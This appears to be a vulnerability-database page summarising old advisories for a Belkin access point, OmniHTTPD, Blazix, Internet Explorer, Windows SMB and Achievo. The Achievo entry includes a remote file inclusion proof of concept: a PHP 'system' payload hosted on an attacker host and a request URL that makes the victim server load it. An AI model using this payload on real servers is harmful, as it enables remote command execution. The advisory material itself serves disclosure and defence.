Explore Vulnerabilities

Explore all Exploits:

Denial of Service Vulnerability in Belkin F5D6130 Wireless Network Access Point

A denial of service vulnerability has been reported in the Belkin F5D6130 Wireless Network Access Point. Reportedly, this issue may be exploited by making a sequence of SNMP requests. A valid community name is not required. After a number of SNMP requests are made, the device will fail to respond to further requests. Additionally, all wireless connections will be dropped, and new connections refused. Under some conditions, the device may also fail to respond on the ethernet interface.

Cross Site Scripting Vulnerabilities in Multiple Sample Scripts

Cross site scripting vulnerabilities have been reported in multiple sample scripts included with OmniHTTPD. In particular, test.shtml and test.php contain errors. This type of vulnerability may be used to steal cookies or perform other web-based attacks.

Blazix Directory Listing Vulnerability

Blazix is a freely available, open source web server written in Java. It is available for Linux and Microsoft Windows operating systems. Blazix does not properly handle some special characters when appended to requests. By passing a special character with a request to the web server, it is possible for a user to gain access to a listing of a password protected directory. This could result in information disclosure, and could potentially be used to gain intelligence in launching an attack against a system.

Blazix Web Server JSP File Disclosure Vulnerability

When a user passes a request to the web server that ends in either a plus (+) or backslash (\), the web server may react unpredictably. This type of character appended to the name of a .jsp file has been reported to reveal the contents of the .jsp file.

Microsoft Internet Explorer Dialog Injection Vulnerability

Microsoft Internet Explorer includes support for dialog windows through script calls to the two functions showModalDialog and showModelessDialog. These functions accept a URL location for the dialog content, and an optional argument parameter to allow data to be passed to the dialog from the calling page. A check is done to ensure that data is only passed to dialogs located in the same domain as the calling page. However, if the URL provided as the dialog source redirects to a second location, only the first is subject to this security check. Exploitation may allow malicious content to be inserted into sensitive dialogs. Execution of arbitrary script within the Local Computer Zone has been demonstrated.

Buffer Overflow Vulnerability in Microsoft Internet Explorer’s Legacy Text Formatting ActiveX Control

A buffer overflow vulnerability has been reported in Microsoft Internet Explorer's Legacy Text Formatting ActiveX control. The Legacy Text Formatting ActiveX control is used by Internet Explorer to display specially formatted text. Reportedly, the ActiveX control is vulnerable to a buffer overflow condition. Microsoft has reported that the specific ActiveX control is not installed by default as part of Internet Explorer. The control, however, will be downloaded as it is needed from a Microsoft Web Site.

Microsoft Windows SMB Buffer Overflow Vulnerability

A buffer overflow vulnerability has been reported in the handling of some malformed SMB requests. An attacker may send a malformed SMB request packet in order to exploit this condition. It has been reported possible to corrupt heap memory, leading to a crash of the underlying system. It may prove possible to exploit this vulnerability to execute arbitrary code and gain local access to the vulnerable system. This possibility has not, however, been confirmed. Reportedly, this vulnerability may be exploited both as an authenticated user, and with anonymous access to the service.

Achievo Remote Command Execution Vulnerability

Achievo includes a PHP script which is used to generate JavaScript (class.atkdateattribute.js.php). This script employs a number of PHP include_once() statements to call code contained in function libraries and grab configuration information. Attackers may subvert the variable ($config_atkroot) which is used to store the location of the external files and specify an arbitrary location, such as an attacker-supplied PHP script on a remote host. Exploitation of this issue will enable the remote attacker to execute commands with the privileges of the webserver hosting the vulnerable software.

Create the following text file (ls.txt) and store it on the attacker host where it is publicly accessible:

<?php system('ls'); ?>

And cause the vulnerable script on the victim host to invoke it with the following request:

http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt?

Recent Exploits: